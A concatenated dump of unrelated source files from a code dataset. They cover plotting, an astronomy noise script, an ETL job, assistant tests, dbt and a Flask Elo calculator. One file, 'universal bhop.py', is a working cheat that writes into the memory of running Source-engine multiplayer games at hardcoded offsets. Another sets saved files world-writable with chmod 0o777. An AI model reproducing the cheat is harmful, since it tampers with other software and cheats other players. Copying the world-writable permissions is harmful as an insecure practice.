self.textDialog.textList.addItem(item) \n self.plt_labelsize_sb.setValue(general_config['labelsize_sb'])\n self.plt_legendsize_sb.setValue(general_config['legendsize_sb'])\n self.plt_ticksize_sb.setValue(general_config['ticksize_sb'])\n self.plt_titlesize_sb.setValue(general_config['titlesize_sb'])\n self.plt_legendpos.setCurrentIndex(general_config['legendpos'])\n self.plt_grid.setChecked(general_config['grid'])\n self.plt_marginx.setValue(general_config['marginx'])\n self.plt_marginy.setValue(general_config['marginy']) \n acc = 0 \n for s in self.plots_canvases:\n for p in s:\n p.canvas.restore_properties(plotdata[acc])\n acc += 1\n for ds in self.datasets:\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, ds)\n qlwt.setText(ds.title)\n self.dataset_list.addItem(qlwt)\n for dl in ds.datalines:\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, dl)\n qlwt.setText(dl.name)\n self.dataline_list.addItem(qlwt)\n if(ds.type == 'filter'):\n self.filters.append(ds)\n self.selfil_cb.blockSignals(True)\n self.stages_selfil_cb.blockSignals(True)\n self.selfil_cb.addItem(ds.title, ds)\n self.stages_selfil_cb.addItem(ds.title, ds)\n self.selfil_cb.blockSignals(False)\n self.stages_selfil_cb.blockSignals(False)\n\n self.dataset_list.setCurrentRow(self.dataset_list.count() - 1)\n self.updateAll()\n \n def updateAll(self):\n self.updatePlots()\n self.updateSelectedDataline()\n self.updateFilterParametersAvailable()\n self.updateTexts()\n \n def getRelevantFrequencies(self, zeros, poles):\n singularitiesNorm = np.append(np.abs(zeros), np.abs(poles))\n singularitiesNormWithoutZeros = singularitiesNorm[singularitiesNorm!=0]\n if(len(singularitiesNormWithoutZeros) == 0):\n return (1, 1)\n return (np.min(singularitiesNormWithoutZeros), np.max(singularitiesNormWithoutZeros))\n \n def getMultiplierAndPrefix(self, val):\n multiplier = 1\n prefix = ''\n if(val < 1e-7):\n multiplier = 1e9\n prefix = 'n'\n elif(val < 1e-4):\n multiplier = 1e-6\n prefix = 'μ'\n elif(val < 1e-1):\n multiplier = 1e-3\n prefix = 'm'\n elif(val < 1e2):\n multiplier = 1\n prefix = ''\n elif(val < 1e5):\n multiplier = 1e3\n prefix = 'k'\n elif(val < 1e8):\n multiplier = 1e6\n prefix = 'M'\n elif(val > 1e11):\n multiplier = 1e9\n prefix = 'G'\n return (multiplier, prefix)","repo_name":"Fditoro/PlotTool_Grupo5","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":62353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2840839793","text":"import sys\nsys.path.append(\"../..\")\n\nimport numpy as np\nimport SO_Noise_Calculator_Public_20180822 as so_n\nimport healpy as hp\nimport matplotlib.pyplot as plt\n\nnside = 16\nlmax = 500\nseed = 1234\nchannel = 2\n\nnh_LA = hp.ud_grade(\n hp.read_map(\"../../data/total_hits_LA_classical.fits.gz\", verbose=False),\n nside_out=nside,\n)\nnh_LA /= np.amax(nh_LA)\nfsky_LA = np.mean(nh_LA)\nls_LA, Nl_LA_T, Nl_LA_P, _ = so_n.Simons_Observatory_V3_LA_noise(1, fsky_LA, lmax, 1)\n# Extending to l=0\nNl_LA_Tb = np.zeros([len(Nl_LA_T), len(ls_LA) + 2])\nNl_LA_Tb[:, 2:] = Nl_LA_T\nNl_LA_Tb[:, :2] = 0.\nNl_LA_T = Nl_LA_Tb\nNl_LA_Pb = np.zeros([len(Nl_LA_P), len(ls_LA) + 2])\nNl_LA_Pb[:, 2:] = Nl_LA_P\nNl_LA_Pb[:, :2] = 0.\nNl_LA_P = Nl_LA_Pb\nls_LA = np.arange(len(ls_LA) + 2)\n\nnh_SA = hp.ud_grade(\n hp.read_map(\"../../data/total_hits_SA_classical.fits.gz\", verbose=False),\n nside_out=nside,\n)\nnh_SA /= np.amax(nh_SA)\nfsky_SA = np.mean(nh_SA)\nls_SA, Nl_SA_P, _ = so_n.Simons_Observatory_V3_SA_noise(1, 1, 1., fsky_SA, lmax, 1)\n# Extending to l=0\nNl_SA_Pb = np.zeros([len(Nl_SA_P), len(ls_SA) + 2])\nNl_SA_Pb[:, 2:] = Nl_SA_P\nNl_SA_Pb[:, :2] = 0.\nNl_SA_P = Nl_SA_Pb\nNl_SA_T = Nl_SA_P / 2.\nls_SA = np.arange(len(ls_SA) + 2)\n\n# Create maps\nnp.random.seed(seed)\nzeros = np.zeros(len(ls_LA))\nt_LA, q_LA, u_LA = hp.synfast(\n [Nl_LA_T[channel], Nl_LA_P[channel], Nl_LA_P[channel], zeros, zeros, zeros],\n nside=nside,\n pol=True,\n new=True,\n verbose=False,\n)\ngoodpix = np.where(nh_LA > 0)\nbadpix = np.where(nh_LA <= 0)\nfor m in [t_LA, q_LA, u_LA]:\n m[badpix] = 0\n m[goodpix] /= np.sqrt(nh_LA[goodpix])\n\nnp.random.seed(seed)\nt_SA, q_SA, u_SA = hp.synfast(\n [Nl_SA_T[channel], Nl_SA_P[channel], Nl_SA_P[channel], zeros, zeros, zeros],\n nside=nside,\n pol=True,\n new=True,\n verbose=False,\n)\ngoodpix = np.where(nh_SA > 0)\nbadpix = np.where(nh_SA <= 0)\nfor m in [t_SA, q_SA, u_SA]:\n m[badpix] = 0\n m[goodpix] /= np.sqrt(nh_SA[goodpix])\n\n# Write maps\nhp.write_map(\n \"noise_SA_uKCMB_classical_nside%d_channel%d_seed%d.fits\" % (nside, channel, seed),\n [t_SA, q_SA, u_SA],\n)\nhp.write_map(\n \"noise_LA_uKCMB_classical_nside%d_channel%d_seed%d.fits\" % (nside, channel, seed),\n [t_LA, q_LA, u_LA],\n)\n","repo_name":"galsci/mapsims","sub_path":"scripts/make_benchmark.py","file_name":"make_benchmark.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"22787910547","text":"import os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Union\n\nimport pandas as pd\nfrom hyperstyle.src.python.review.application_config import LanguageVersion\n\nfrom analysis.src.python.data_analysis.model.column_name import SubmissionColumns\nfrom analysis.src.python.evaluation.utils.pandas_utils import get_language_version\nfrom analysis.src.python.utils.file_utils import copy_directory, create_file, get_parent_folder\n\nTEMPLATE_DIRECTORY = Path(__file__).parents[3] / 'resources' / 'evaluation' / 'project_templates'\n\n\n@dataclass(frozen=True)\nclass TemplateConfig:\n template_path: Path\n template_root: Path\n filename: str\n\n\ndef get_template_config(language_version: LanguageVersion) -> TemplateConfig:\n if language_version.is_java():\n return TemplateConfig(template_path=TEMPLATE_DIRECTORY / 'java',\n template_root=Path('src', 'main', 'java'),\n filename='Main')\n\n elif language_version == LanguageVersion.PYTHON_3:\n return TemplateConfig(template_path=TEMPLATE_DIRECTORY / 'python',\n template_root=Path(),\n filename='main')\n\n raise NotImplementedError(f\"Template is not provided for language {language_version.value}. \"\n f\"Please implement template in {TEMPLATE_DIRECTORY}\")\n\n\ndef save_solutions_to_files(df_solutions: pd.DataFrame,\n language_version: LanguageVersion,\n input_path: Path,\n with_template: bool = False):\n \"\"\"\n Save solutions to input_path.\n If with_template=True copy language version specific template to input_path.\n Save given solutions to input_path according to structure described in `configure_solution_file` method.\n \"\"\"\n\n if with_template:\n # If template is required copy project template to input directory\n template_config = get_template_config(language_version)\n copy_directory(template_config.template_path, input_path)\n\n # Template set language specific requirements for solutions directory and filenames\n df_solutions.apply(save_solution_to_file,\n input_path=input_path / template_config.template_root,\n filename=template_config.filename,\n axis=1)\n\n else:\n df_solutions.apply(save_solution_to_file,\n input_path=input_path,\n axis=1)\n\n\ndef save_solution_to_file(solution: pd.Series,\n input_path: Path,\n filename: str = 'code') -> Path:\n \"\"\"\n Save solution code to file with path: input_path / root_path / solution_{solution_id} / filename.extension where:\n root_path = default_root_path by default but can be changes according to solution language version template\n filename = default_filename by default but can be changes according to solution language version template\n extension is selected according to solution language version\n\n Examples:\n java11 file with template: input_path/src/main/java/solution_12/Main.java\n java11 file without template: input_path/solution_12/code.java\n\n python3 file with template: input_path/solution_13/main.py\n python3 file without template: input_path/solution_13/code.py\n\n js file without template: input_path/solution_14/code.js\n \"\"\"\n\n solution_id = solution[SubmissionColumns.ID.value]\n solution_code = solution[SubmissionColumns.CODE.value]\n lang = solution[SubmissionColumns.LANG.value]\n language_version = get_language_version(lang)\n extension = language_version.extension_by_language()\n\n solution_file_path = input_path / f'solution_{solution_id}' / f'{filename}{extension.value}'\n\n return save_code_to_file(solution_file_path, solution_code)\n\n\ndef save_code_to_file(file_path: Union[Path, str], code: str) -> Path:\n \"\"\" Save solution code to given file_path. \"\"\"\n\n solution_file_path = next(create_file(file_path, code))\n os.chmod(solution_file_path, 0o777)\n return solution_file_path\n\n\ndef get_solution_id_by_file_path(solution_file_path: str) -> int:\n \"\"\"\n As solution is store like input_path / root_path / solution_{solution_id} / filename.extension\n we can easily parse solution id from file_path.\n \"\"\"\n\n parent_directory = get_parent_folder(solution_file_path)\n _, solution_id = parent_directory.name.split('_')\n return int(solution_id)\n","repo_name":"nbirillo/hyperstyle-analyze","sub_path":"analysis/src/python/evaluation/tools/utils/saving_utils.py","file_name":"saving_utils.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"17260630356","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"Insert records into songs and artists tables using data from a single song_data file.\"\"\"\n \n # open song file\n df = pd.read_json(filepath, lines=True) \n\n # create song dataframe and change the data to list\n song_data = df[[\"song_id\",\"title\",\n \"artist_id\",\"year\",\n \"duration\"\n ]].values.tolist()\n \n song_data = (song_data[0][0],song_data[0][1],\n song_data[0][2],song_data[0][3],\n song_data[0][4])\n \n # insert songplay record \n try:\n cur.execute(song_table_insert, song_data)\n except psycopg2.Error as e: \n print(\"Error:this line has corrupted data\")\n print (e)\n \n # create artist dataframe\n artist_data = df[[\"artist_id\", \"artist_name\", \n \"artist_location\", \"artist_latitude\", \n \"artist_longitude\"\n ]].values.tolist()\n \n artist_data = (artist_data[0][0], artist_data[0][1], \n artist_data[0][2], artist_data[0][3], \n artist_data[0][4])\n \n # Change the data to list and run cur.execute to insert data\n cur.execute(artist_table_insert, artist_data)\n\n\ndef process_log_file(cur, filepath):\n \"\"\"Insert records into time and user tables using data from a single log_data file.\"\"\"\n \n # open log file\n df = pd.read_json(filepath, lines=True)\n\n # filter by NextSong action\n df = df.loc[df['page'] == 'NextSong']\n\n # convert datetime column to timestamp, hour, day,\n # weekofyear, month, year, weekday\n t = pd.to_datetime(df['ts'], unit='ms')\n time_data_list = t.tolist()\n time_data_list2 = []\n for i in time_data_list:\n time_data_list2.append([i, i.hour, \n i.day,i.weekofyear,\n i.month, i.year,\n i.strftime('%A')\n ])\n \n # Create time dataframe before insert time data records\n time_data = time_data_list2\n column_labels = (\n 'timestamp','hour',\n 'day','week_of_year',\n 'month','year','weekday')\n time_df = pd.DataFrame(time_data, columns=column_labels )\n \n # Loop through each time row and insert into time table\n for i, row in time_df.iterrows():\n #print(list(row))\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = pd.DataFrame(df, columns=[\"userId\",\"firstName\", \n \"lastName\",\"gender\",\n \"level\"\n ])\n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # Loop through each log files for data and insert songplay records\n for index, row in df.iterrows():\n # get songid and artistid from song and artist tables\n cur.execute(song_select,(row.song , row.artist ,row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n #print(songid + \" \"+ artistid)\n # insert songplay record\n songplay_data = ( \n t[index], row.userId, \n row.level,songid, artistid, \n row.sessionId , row.location, \n row.userAgent )\n \n cur.execute(songplay_table_insert, songplay_data)\n\n\ndef process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n \n \"\"\" This line fix a encoding problem during the runtime \"\"\"\n conn.set_client_encoding('UTF8')\n\n \n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"kent5i5/postgre_bigdata","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34879519729","text":"#! /usr/bin/python3\n\nimport argparse\nfrom util import rominfo\nfrom segtypes.code import N64SegCode\n\nparser = argparse.ArgumentParser(description=\"Create a splat config from a rom\")\nparser.add_argument(\"rom\", help=\"path to a .z64 rom\")\n\n\ndef main(rom_path):\n rom = rominfo.get_info(rom_path)\n basename = rom.name.replace(\" \", \"\").lower()\n\n header = \\\n\"\"\"name: {0} ({1})\nbasename: {2}\noptions:\n find-file-boundaries: True\n compiler: \"IDO\"\n\"\"\".format(rom.name.title(), rom.get_country_name(), basename)\n\n # codeseg = N64SegCode(0x1000, rom.size, \"asm\", \"firstseg\", rom.entry_point, [{\"start\": 0x1000, \"end\": rom.size, \"name\": \"firstseg\", \"vram\": rom.entry_point, \"subtype\": \"asm\"}], {})\n # codeseg.split\n\n segments = \\\n\"\"\"segments:\n - name: header\n type: header\n start: 0x0\n vram: 0\n files:\n - [0x0, header, header]\n - name: boot\n type: bin\n start: 0x40\n - name: the_rest\n type: bin\n start: 0x1000\n - [0x{:X}]\n\"\"\".format(rom.size)\n\n outstr = header + segments\n \n outname = rom.name.replace(\" \", \"\").lower()\n with open(outname + \".yaml\", \"w\", newline=\"\\n\") as f:\n f.write(outstr)\n \nif __name__ == \"__main__\":\n args = parser.parse_args()\n main(args.rom)\n","repo_name":"zestydevy/paint-studio","sub_path":"tools/n64splat/create_config.py","file_name":"create_config.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"12512196634","text":"#User function Template for python3\n\nclass Solution:\n #Complete this function\n # Function to find the maximum index difference.\n def maxIndexDiff(self,A, N): \n max_sum = 0\n for i in range(N):\n for j in range(N-1, 0, -1):\n if A[i] <= A[j] and i <= j:\n max_sum = max(j-i, max_sum)\n break\n \n return max_sum\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nimport math\n\ndef main():\n T=int(input())\n while(T>0):\n \n n=int(input())\n \n arr=[int(x) for x in input().strip().split()]\n ob=Solution()\n print(ob.maxIndexDiff(arr,n))\n \n \n T-=1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"piyushrs/GFG","sub_path":"maximum_index.py","file_name":"maximum_index.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19709738174","text":"import pandas as pd\nimport sys\nimport numpy as np\n\n\ndef read_data(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n train= pd.read_csv(data_file)\n target='bug'\n IDcol='name'\n x_columns = [x for x in train.columns if x not in [target,IDcol]]\n metrics_num=len(x_columns) \n print(\"The Number of metrics: \"+str(metrics_num))\n all_data = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=range(1, metrics_num+1))\n return all_data\n else:\n print(\"Unsupported File: \" + data_file)\n sys.exit()\n \ndef read_data_python(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n train= pd.read_csv(data_file)\n target='bug'\n IDcol='name'\n x_columns = [x for x in train.columns if x not in [target,IDcol]]\n metrics_num=len(x_columns) \n print(\"The Number of metrics: \"+str(metrics_num))\n all_data = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=range(1, metrics_num+1))\n all_label = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=metrics_num+1)\n\n return all_data,all_label\n \n else:\n print(\"Unsupported File: \" + data_file)\n sys.exit()\n\ndef read_text_data(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n handle=open(data_file,'r')\n lines=handle.readlines()\n result_list=[]\n for each_line in lines:\n result_list.append(each_line)\n return result_list\n \ndef defect_data_read(data_file):\n \n class_loc_dict={}\n class_defect_dict={}\n class_name_list=[]\n \n defect_file=open(data_file,'r')\n lines=defect_file.readlines()\n for index,each_line in enumerate(lines):\n if(index!=0):\n records=each_line.strip('\\n').split(',')\n class_name=records[0]\n class_loc_dict[class_name]=float(records[1])\n defect_count=int(records[21])\n class_defect_dict[class_name]=defect_count\n class_name_list.append(class_name)\n \n return class_name_list,class_loc_dict,class_defect_dict","repo_name":"quyutest/node2defect","sub_path":"SupportingTools/ReadFile.py","file_name":"ReadFile.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"29035537847","text":"import alice.tests.library.directives as directives\nimport alice.tests.library.scenario as scenario\nimport alice.tests.library.surface as surface\nimport pytest\n\n\n@pytest.mark.experiments(\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.link_a_remote',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu_check.status',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu_manual.start',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu.stop',\n 'bg_fresh_granet_form=personal_assistant.scenarios.request_technical_support',\n)\nclass TestLinkARemote(object):\n\n owners = ('flimsywhimsy')\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.parametrize('command', [\n 'подключи пульт',\n 'прицепи умный пульт управления яндекс',\n 'алиса включи настройку умного пульта управления к станции',\n ])\n def test_link_a_remote(self, alice, command):\n response = alice(command)\n assert response.scenario == scenario.LinkARemote\n assert len(response.directives) == 2\n assert response.directives[0].name == directives.names.SetupRcuDirective\n\n @pytest.mark.parametrize('surface', [surface.searchapp])\n def test_link_a_remote_fail(self, alice):\n response = alice('подключи пульт')\n assert response.scenario == scenario.LinkARemote\n assert response.text == 'Я не умею подключать пульт здесь.'\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.device_state(rcu={\n 'is_rcu_connected': True,\n 'setup_state': 0,\n })\n def test_link_a_remote_skip_setup_rcu(self, alice):\n response = alice('настрой пульт')\n assert response.scenario == scenario.LinkARemote\n assert len(response.directives) == 2\n assert response.directives[0].name == directives.names.SetupRcuAutoDirective\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.device_state(rcu={\n 'is_rcu_connected': True,\n })\n @pytest.mark.parametrize('command, status, setup_state, expected_directives', [\n ('setup_rcu_status_frame', 'Success', 1, [directives.names.SetupRcuAutoDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_status_frame', 'Error', 1, [directives.names.SetupRcuDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_status_frame', 'InactiveTimeout', 1, []),\n ('setup_rcu_auto_status_frame', 'Success', 2, [directives.names.SetupRcuCheckDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_auto_status_frame', 'Error', 2, [directives.names.SetupRcuManualDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_check_status_frame', 'Success', 3, [directives.names.GoHomeDirective]),\n ('setup_rcu_check_status_frame', 'Error', 3, [directives.names.SetupRcuAdvancedDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_check_status_frame', 'InactiveTimeout', 3, []),\n ('setup_rcu_advanced_status_frame', 'Success', 4, [directives.names.SetupRcuCheckDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_advanced_status_frame', 'Error', 4, [directives.names.SetupRcuAdvancedDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_auto_start_frame', 'Samsung', 5, [directives.names.SetupRcuAutoDirective, directives.names.TtsPlayPlaceholderDirective]),\n ])\n def test_typed_semantic_frame(self, alice, command, status, setup_state, expected_directives):\n alice.device_state.RcuState.SetupState = setup_state\n\n response = alice.call(command, status)\n assert response.scenario == scenario.LinkARemote\n directive_names = [_.name for _ in response.directives]\n assert directive_names == expected_directives\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/link_a_remote/testpalm_link_a_remote.py","file_name":"testpalm_link_a_remote.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39362254249","text":"import re\n\n\ndef without_regexp(line):\n dic = {}\n i = 0\n j = 0\n while i != -1:\n i = line.find('(', i + 1)\n j = line.find(')', j + 1)\n dic[i] = 'i'\n dic[j] = 'j'\n\n parenthesis_count = 0\n start_index = 0\n start_index2 = 0\n end_index = 0\n distance_more_than_one = False\n new_line = ''\n for k in sorted(dic.keys())[1:]:\n if dic[k] == 'i' and not parenthesis_count:\n parenthesis_count += 1\n end_index = k\n new_line += line[start_index:end_index]\n distance_more_than_one = False\n start_index = k\n continue\n elif dic[k] == 'i' and parenthesis_count >= 1:\n start_index2 = k\n parenthesis_count += 1\n continue\n elif dic[k] == 'j' and parenthesis_count == 2:\n end_index = k + 1\n if start_index2 - start_index == 1:\n new_line += line[start_index:end_index]\n parenthesis_count = 0\n distance_more_than_one = False\n start_index = k + 1\n else:\n parenthesis_count -= 1\n distance_more_than_one = True\n continue\n elif dic[k] == 'j' and parenthesis_count == 1:\n end_index = k + 1\n parenthesis_count -= 1\n if distance_more_than_one and parenthesis_count:\n new_line += ''\n else:\n new_line += line[start_index:end_index]\n start_index = k + 1\n continue\n return new_line\n\n\ndef sub_func(m):\n new = m.group(0)[0]\n return f'{new}'\n\n\ndef with_regexp(line):\n new_line = re.sub(r'[^(]([(][a-zA-Z0-9]+.+)', sub_func, line)\n return new_line\n\n\nif __name__ == '__main__':\n line = 'abra((esdf)(esdf'\n without_regexp(line)\n with_regexp(line)\n","repo_name":"amozalev/parentheses-count","sub_path":"parentheses.py","file_name":"parentheses.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33225231597","text":"import shutil\nimport os\nimport webbrowser\n\nfrom dbt.include.global_project import DOCS_INDEX_FILE_PATH\nfrom http.server import SimpleHTTPRequestHandler\nfrom socketserver import TCPServer\nfrom dbt.events.functions import fire_event\nfrom dbt.events.types import ServingDocsPort, ServingDocsAccessInfo, ServingDocsExitInfo, EmptyLine\n\nfrom dbt.task.base import ConfiguredTask\n\n\nclass ServeTask(ConfiguredTask):\n def run(self):\n os.chdir(self.config.target_path)\n\n port = self.args.port\n address = \"0.0.0.0\"\n\n shutil.copyfile(DOCS_INDEX_FILE_PATH, \"index.html\")\n\n fire_event(ServingDocsPort(address=address, port=port))\n fire_event(ServingDocsAccessInfo(port=port))\n fire_event(EmptyLine())\n fire_event(EmptyLine())\n fire_event(ServingDocsExitInfo())\n\n # mypy doesn't think SimpleHTTPRequestHandler is ok here, but it is\n httpd = TCPServer( # type: ignore\n (address, port), SimpleHTTPRequestHandler # type: ignore\n ) # type: ignore\n\n if self.args.open_browser:\n try:\n webbrowser.open_new_tab(f\"http://127.0.0.1:{port}\")\n except webbrowser.Error:\n pass\n\n try:\n httpd.serve_forever() # blocks\n finally:\n httpd.shutdown()\n httpd.server_close()\n\n return None\n","repo_name":"degagawolde/data-warehouse-dbt-airflow-postgress","sub_path":"deng/lib/python3.8/site-packages/dbt/task/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"14922670731","text":"import dearpygui.dearpygui as dpg\nimport pymem, threading, keyboard, time, sys, pyautogui\n\n#Constants\ndoJump = 5\ndontJump = 4\n#End of Constants\n\nkillAllThreads = False\n\n#Declaration\nonGround = hex\ndwForceJump = hex\nprocess = 0\nclientDLL = 0\n\n#Get the correct offset for the correct game\nfor window in pyautogui.getAllWindows():\n if window.title == \"HALF-LIFE: Deathmatch\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0x46AF1C\n dwForceJump = clientDLL + 0x468994\n \n if window.title == \"Counter-Strike Source\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0x4F82AC\n dwForceJump = clientDLL + 0x4F5D24\n\n if window.title == \"Team Fortress 2\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0xC93A3C\n dwForceJump = clientDLL + 0xC90840\n\n if window.title == \"Counter-Strike: Global Offensive - Direct3D 9\":\n process = pymem.Pymem(\"csgo.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll \n onGround = clientDLL + 0xDF1B54\n dwForceJump = clientDLL + 0x52BBCD8\n \n if window.title == \"Left 4 Dead 2 - Direct3D 9\":\n process = pymem.Pymem(\"left4dead2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll \n onGround = clientDLL + 0x77FBB4\n dwForceJump = clientDLL + 0x757DF0\n\n#if no game is open\nif onGround == hex or dwForceJump == hex or process == 0 or clientDLL == 0:\n sys.exit()\n\n# functions for the key binding\ndef get_bind(elem): # function to get the bind from a button\n button_label = dpg.get_item_label(elem) # getting button label\n return button_label.split(':')[1].strip()\n\ndef set_bind(sender):\n dpg.set_item_indent(\"bhopKey\", 10)\n while True:\n key = keyboard.read_key()\n if key:break # if a key is pressed, break\n dpg.set_item_indent(\"bhopKey\", 0)\n dpg.set_item_label(sender, f'bind: {key}') # setting bind to button\n\n\n#Window & GUI creation\ndpg.create_context()\nwith dpg.window(tag=\"Window\", label=\" \", width=300, height=300, no_collapse=True, no_resize=True):\n\n dpg.add_checkbox(tag=\"bhopCheck\", label=\"Toggle Bhop\", default_value=True)\n dpg.add_button(tag=\"bhopKey\", label=\"bind: space\", callback=set_bind) #Button that acts a key bind\n dpg.add_spacer(height=165)\n\n dpg.add_button(tag=\"destButton\", label=\"destroy gui\")\n\ndpg.create_viewport(title=\"Bhop\", width=300, max_width=300, min_width=300, height=300, max_height=300, min_height=300)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.set_primary_window(\"Window\", True)\n\n#Bhop function/thread\ndef bhop():\n while True:\n if killAllThreads == True:\n sys.exit()\n\n if process.read_int(onGround) == True:\n if keyboard.is_pressed(get_bind(\"bhopKey\")):\n if dpg.get_value(\"bhopCheck\") == False: # ? I WOULD place the if check outside of these other if statements\n continue # ? BUT the keyboard library is picky about when checking the key\n # ? that it causes input lag.\n process.write_int(dwForceJump, doJump)\n else:\n process.write_int(dwForceJump, dontJump)\nbhopThread = threading.Thread(target=bhop, args=())\nbhopThread.start()\n\n#Main rendering loop\nwhile dpg.is_dearpygui_running():\n\n #Close button\n if dpg.get_item_state(\"destButton\")['clicked'] == True:\n killAllThreads = True\n dpg.stop_dearpygui()\n\n dpg.render_dearpygui_frame()\n\n#If they press the X button, then it will hit this and exit.\nkillAllThreads = True\ndpg.destroy_context()","repo_name":"yoshisaac/PyCheats","sub_path":"Source/universal bhop.py","file_name":"universal bhop.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29430854788","text":"__author__ = '212391398'\n\nimport random\nimport compute\nimport os\n\nfrom flask import Flask\nfrom flask import request\n\napp = Flask(__name__)\n\n@app.route('/competitors')\ndef list():\n with open(\"competitors.json\") as fin:\n ret = fin.read()\n return ret\n\n@app.route('/calculate')\ndef calculate():\n c1Str = request.args.get('c1')\n c2Str = request.args.get('c2')\n matchStr = request.args.get('match')\n\n c1 = int(c1Str)\n c2 = int(c2Str)\n match = float(matchStr)\n\n #match = 1\n #c1 = 1583\n #c2 = 1572\n\n results = compute.calculate_elo_rank(c1, c2, match)\n\n ret = \"Current Competitor 1: \" + str(c1) + \"
\"\n ret += \"Current Competitor 2: \" + str(c2) + \"
\"\n ret += \"Match: \" + str(match) + \"
\"\n ret += \"New Competitor 1 rank: \" + str(results[0]) + \"
\"\n ret += \"New Competitor 2 rank: \" + str(results[1]) + \"
